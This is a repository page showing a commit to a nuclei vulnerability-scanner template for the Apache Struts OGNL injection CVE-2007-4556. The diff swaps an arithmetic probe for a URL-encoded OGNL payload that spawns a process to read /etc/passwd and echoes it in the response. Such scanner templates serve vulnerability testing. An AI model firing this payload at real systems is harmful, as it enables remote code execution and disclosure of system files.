daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

update payloads CVE-2007-4556 🛠

patch-1
PikPikcU 2021-02-23 02:37:32 +00:00 committed by GitHub
parent 3be6ea99fd
commit 7eff3819e8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
cves/2007/CVE-2007-4556.yaml
View File

@ -14,14 +14,14 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=test&password=%25%7B123456789*987654321%7D
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
- type: word
words:
- "-67153019"
- type: regex
regex:
- "root:[x*]:0:0"
condition: and
- type: status